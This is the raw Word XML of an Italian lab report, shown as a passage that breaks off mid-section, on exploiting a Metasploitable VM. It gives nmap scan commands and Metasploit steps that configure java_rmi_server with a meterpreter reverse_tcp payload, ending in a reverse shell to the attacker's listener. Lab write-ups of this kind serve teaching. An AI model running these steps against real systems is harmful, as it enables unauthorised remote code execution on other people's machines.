        <w:t xml:space="preserve">5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Fase 1 — Ricognizione e Scansione della Rete</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 Scansione preliminare della rete</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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In assenza di conoscenza pregressa circa l'indirizzo IP effettivo della macchina vittima, si è proceduto a un'attività di host discovery tramite lo strumento Nmap, applicato all'intero segmento di rete 192.168.11.0/24:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="8940.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8940"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="894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color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap 192.168.11.0/24</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'esecuzione della scansione, riportata in Figura 3, ha consentito di individuare l'host attivo all'indirizzo 192.168.11.112, con un totale di venti porte TCP in stato open.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5760410" cy="33909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6041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276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'ampiezza della superficie di attacco esposta dalla macchina vittima — riconducibile alla natura intenzionalmente vulnerabile della distribuzione Metasploitable — risulta già evidente da questa prima fase ricognitiva, in cui si segnala la presenza di servizi obsoleti e storicamente affetti da vulnerabilità note.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.2 Scansione mirata con identificazione delle versioni software</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confermata la presenza dell'host target, si è proceduto a una scansione più approfondita, mediante l'opzione -sV, finalizzata all'identificazione puntuale delle versioni dei servizi in esecuzione:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>
        <w:tblW w:w="9180.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5C">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap -sV 192.168.11.112</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5760410" cy="28448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6041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76" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dall'analisi dell'output si rileva la presenza di numerosi servizi con versioni datate e notoriamente vulnerabili (tra cui vsFTPd 2.3.4, UnrealIRCd, Samba 3.X, ProFTPD 1.3.1), a conferma della finalità didattica della macchina target. Ai fini della presente esercitazione, l'attenzione è stata rivolta specificamente al servizio Java RMI in ascolto sulla porta 1099/tcp, in conformità con quanto indicato nella consegna dell'esercizio.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:color="8496b0" w:space="4" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="480" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Fase 2 — Identificazione della Vulnerabilità</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il servizio Java RMI (Remote Method Invocation), qualora non adeguatamente configurato, consente l'esecuzione di codice arbitrario da remoto attraverso il registro RMI, sfruttando l'assenza di controlli di validazione sugli oggetti serializzati scambiati tra client e server. Tale debolezza è classificata come Insecure Default Configuration ed è nota nel database delle vulnerabilità pubbliche.</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rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Per individuare i moduli Metasploit pertinenti, è stato avviato il framework e condotta una ricerca mirata:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6"/>
        <w:tblW w:w="9030.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9030"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="903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62">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">msfconsole</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">search java_rmi</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5760410" cy="14605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6041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276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tra i moduli restituiti, è stato selezionato exploit/multi/misc/java_rmi_server, corrispondente alla vulnerabilità Java RMI Server Insecure Default Configuration Java Code Execution, in ragione della sua elevata affidabilità (rank "excellent") e della piena coerenza con il servizio identificato in fase di scansione.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:color="8496b0" w:space="4" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="480" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Fase 3 — Sfruttamento della Vulnerabilità (Exploitation)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 Selezione e configurazione del modulo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A seguito della selezione del modulo tramite il comando use 1, Metasploit ha automaticamente associato il payload predefinito java/meterpreter/reverse_tcp. È stata quindi visualizzata la configurazione dei parametri necessari tramite show options:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5760410" cy="23241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41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276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Si è proceduto quindi all'impostazione dei parametri necessari all'esecuzione dell'exploit:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7"/>
        <w:tblW w:w="8970.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6B">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">set RHOSTS 192.168.11.112</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">set RPORT 1099</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">set LHOST 192.168.11.111</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5760410" cy="22606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60410" cy="2260600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5760410" cy="3937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6041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60" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.2 Esecuzione dell'exploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Completata la configurazione dei parametri, è stato lanciato l'exploit tramite il comando exploit. Il framework ha avviato un listener TCP in ascolto sulla porta 4444 dell'host attaccante e ha condotto la sequenza di sfruttamento contro il servizio RMI remoto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8"/>
        <w:tblW w:w="9180.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72">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
